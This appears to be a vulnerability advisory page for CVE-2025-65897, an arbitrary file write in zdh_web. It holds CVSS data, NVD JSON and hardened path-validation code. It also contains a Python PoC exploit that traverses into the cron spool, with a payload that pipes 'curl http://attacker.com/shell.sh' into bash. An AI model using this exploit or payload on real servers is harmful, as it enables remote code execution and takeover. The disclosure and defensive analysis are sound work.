Security Vulnerability Report
CVE-2025-65897 CVSS 8.8 HIGH

Published: 2025-12-05 16:15:51
Last Modified: 2025-12-12 12:52:30

Description

zdh_web is a data collection, processing, monitoring, scheduling, and management platform. In zdh_web through 5.6.17, insufficient validation of file upload paths allows an authenticated user to write arbitrary files to the server file system, potentially overwriting existing files and leading to privilege escalation or remote code execution.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weaknesses
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory), CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

cpe:2.3:a:zhaoyachao:zdh_web:*:*:*:*:*:*:*:* - VULNERABLE
zdh_web <= 5.6.17 (versionEndIncluding 5.6.17; the NVD configuration lists no fixed version, the fix is the commit linked under References)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import requests

# CVE-2025-65897 PoC - zdh_web Arbitrary File Write
# Target: zdh_web <= 5.6.17
# NOTE: the /login and /file/upload endpoints, the 'path' form field and the
# cron-spool write target are as given in this PoC; the advisory text and the
# referenced patch commit do not name them, so verify them against the fix
# before relying on this script.

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080"
USERNAME = "attacker"
PASSWORD = "password"


def login():
    """Authenticate and return a session holding the auth cookie, or None."""
    session = requests.Session()
    login_url = f"{TARGET_URL}/login"
    data = {"username": USERNAME, "password": PASSWORD}
    response = session.post(login_url, data=data, timeout=10)
    # An HTTP 200 alone is a weak signal: many applications answer a failed
    # login with 200 and an error page. Confirm with the upload step below.
    return session if response.status_code == 200 else None


def exploit(session):
    """Attempt the arbitrary file write via path traversal in the upload path."""
    upload_url = f"{TARGET_URL}/file/upload"
    # Illustrative payload from the original PoC. A script dropped into the
    # cron spool only runs if cron accepts the file; this script does not
    # verify that, it only checks that the upload was accepted.
    malicious_content = "#!/bin/bash\n# Malicious cron job\ncurl http://attacker.com/shell.sh|bash"
    files = {"file": ("test.txt", malicious_content, "text/plain")}
    # Inject path traversal in the upload path parameter
    data = {"path": "../../../var/spool/cron/"}
    response = session.post(upload_url, files=files, data=data, timeout=10)
    return response.status_code == 200


if __name__ == "__main__":
    print(f"[*] Exploiting CVE-2025-65897 on {TARGET_URL}")
    session = login()
    if session and exploit(session):
        print("[+] Upload accepted (HTTP 200) - confirm the file landed before claiming RCE")
    else:
        print("[-] Exploitation failed")
```
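The advisory classifies the flaw as CWE-22 (path traversal) layered on CWE-434 (unrestricted upload): the server joins a client-supplied location into its upload directory without checking where the result lands, so the `../../../var/spool/cron/` value in the PoC walks out of the upload root. The Python below is an added illustration of that pattern and of the check that closes it; it is not zdh_web's own code, and the upload root, subdirectories and file names are constructed for the example. `vulnerable_upload_path` reproduces the unsafe join, `safe_upload_path` resolves the candidate path and requires it to stay under the upload root, and `classify` wraps the hardened check so a batch of requests can be run through it.

```python
import os

# Added example (not zdh_web code): the upload-path handling pattern behind
# CWE-22/CWE-434 in this advisory, shown as a vulnerable join beside a
# hardened one. Every path and file name here is constructed for illustration.


class UnsafePathError(ValueError):
    """Raised when a client-supplied upload location escapes the upload root."""


def vulnerable_upload_path(upload_root: str, client_subdir: str, filename: str) -> str:
    # Vulnerable pattern: client-controlled subdirectory and filename are
    # joined into the upload root without validation. "../" components walk
    # out of upload_root, and an absolute client_subdir makes os.path.join
    # discard upload_root entirely. normpath here only mirrors what the
    # kernel does with ".." when the file is opened; it is not a security check.
    return os.path.normpath(os.path.join(upload_root, client_subdir, filename))


def safe_upload_path(upload_root: str, client_subdir: str, filename: str) -> str:
    # 1. NUL bytes terminate C strings; some runtimes silently truncate there.
    if "\x00" in client_subdir or "\x00" in filename:
        raise UnsafePathError("NUL byte in path")
    # 2. The filename must be a bare name: no separators, not "." or "..".
    #    The multipart filename is client-controlled just like the path field.
    if filename in ("", ".", "..") or "/" in filename or "\\" in filename:
        raise UnsafePathError(f"filename is not a bare name: {filename!r}")
    # 3. Reject absolute client paths explicitly rather than relying on the
    #    containment check alone, so the rejection reason is clear in logs.
    if os.path.isabs(client_subdir):
        raise UnsafePathError(f"absolute path not allowed: {client_subdir!r}")
    # 4. Resolve root and candidate (follows symlinks, collapses "..") and
    #    require the candidate to sit under the root. commonpath compares
    #    whole components, so "/srv/uploads-old" is not mistaken for a child
    #    of "/srv/uploads" the way a plain startswith() check would be.
    root = os.path.realpath(upload_root)
    candidate = os.path.realpath(os.path.join(root, client_subdir, filename))
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePathError(f"path escapes upload root: {candidate}")
    return candidate


def classify(upload_root: str, client_subdir: str, filename: str) -> str:
    """Return 'accepted:<resolved path>' or 'rejected:<reason>' for one request."""
    try:
        return "accepted:" + safe_upload_path(upload_root, client_subdir, filename)
    except UnsafePathError as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    ROOT = "/srv/uploads"  # constructed upload root
    # The traversal payload from the PoC, against both implementations.
    payload = ("../../../var/spool/cron/", "test.txt")
    print("vulnerable ->", vulnerable_upload_path(ROOT, *payload))
    print("hardened   ->", classify(ROOT, *payload))
    for subdir, name in [("reports/2025", "data.csv"), ("/etc", "crontab"),
                         ("reports", "../x.sh"), ("../uploads-old", "f.txt")]:
        print(f"{subdir!r}, {name!r} -> {classify(ROOT, subdir, name)}")
```

Two points of the check are easy to get wrong in a fix. First, the containment test must run on the resolved path, after `..` collapse and symlink resolution, and must compare whole path components; a `startswith(upload_root)` test accepts a sibling directory whose name merely shares the prefix. Second, validation has to happen after any URL or form decoding the framework performs, on the exact string that reaches the filesystem call; checking an encoded value and then decoding it later reopens the hole.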

References

https://github.com/zhaoyachao/zdh_web (Product)
https://github.com/zhaoyachao/zdh_web/commit/b2423378a8bf83f159f19ce4e14eac71c939793a (Patch)
https://github.com/zhaoyachao/zdh_web/issues/40 (Issue Tracking, Vendor Advisory)
https://github.com/zhaoyachao/zdh_web/pull/39 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65897", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:50.913", "lastModified": "2025-12-12T12:52:30.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "zdh_web is a data collection, processing, monitoring, scheduling, and management platform. In zdh_web thru 5.6.17, insufficient validation of file upload paths in the application allows an authenticated user to write arbitrary files to the server file system, potentially overwriting existing files and leading to privilege escalation or remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zhaoyachao:zdh_web:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6.17", "matchCriteriaId": "B1C57E92-1507-4906-807A-8341427AAAE9"}]}]}], "references": [{"url": "https://github.com/zhaoyachao/zdh_web", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zhaoyachao/zdh_web/commit/b2423378a8bf83f159f19ce4e14eac71c939793a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zhaoyachao/zdh_web/issues/40", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": 
"https://github.com/zhaoyachao/zdh_web/pull/39", "source": "[email protected]", "tags": ["Patch"]}]}}